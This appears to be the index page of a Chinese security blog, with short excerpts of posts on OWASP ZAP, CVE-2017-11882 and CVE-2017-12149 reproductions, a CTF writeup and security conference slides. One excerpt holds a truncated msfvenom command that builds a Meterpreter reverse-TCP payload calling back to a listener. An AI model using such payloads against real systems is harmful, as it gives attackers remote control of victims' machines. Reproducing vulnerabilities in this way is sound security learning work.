0x01OWASP ZAP OWASP Zed Attack Proxy (ZAP)工具是世界上最受欢迎的免费安全工具之一。ZAP可以帮助安全测试人员在开发和测试应用程序过程中,自动发现 Web应用程序中的安全漏洞……
利用powershell反弹shell到metasploit
一、使用msfvenom生成PS1文件: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.100 LPORT=1234 -f psh-r…
CVE-2017-11882 漏洞复现
漏洞说明 2017年11月14日,微软发布了11月的安全补丁更新,其中值得注意的是CVE-2017-11882.这个漏洞是Office的内存损坏漏洞,攻击者可以利用这个漏洞以当前登录的用户的身份执行……
CVE-2017-12149 JBOOS反序列化漏洞复现
漏洞描述 2017年9月14日,国家信息安全漏洞共享平台(CNVD)收录了JBOSS Application Server反序列化命令执行漏洞(CNVD-2017-33724,对应CVE-2017-12149),远程攻击…
看雪2017安全开发者峰会PPT下载
看雪2017安全开发者峰会PPT、携程沙龙PPT、2017VSRC第一届城市沙龙(议题)、2017VSRC第二届城市沙龙(议题)、2017先知白帽大会议题PPT、2017先知白帽大会议题PPT、2017默安阿里安……
第六届山东省大学生网络安全技能大赛决赛Writeup
Crypto 0x00 RSA1 首先使用python脚本或者openssl解出npython脚本 from Crypto.PublicKey import RSA pub = RSA.importKey(open('p…
SRCMS V3.0.0甲方信息安全中心应急响应CMS
甲方建站类似补天平台建站cms,甲方建设信息安全中心首选 GitHub地址:https://github.com/martinzhou2015/SRCMS-dev 以下是采集项目介绍 0x01欢迎使用SRCMS V3.0…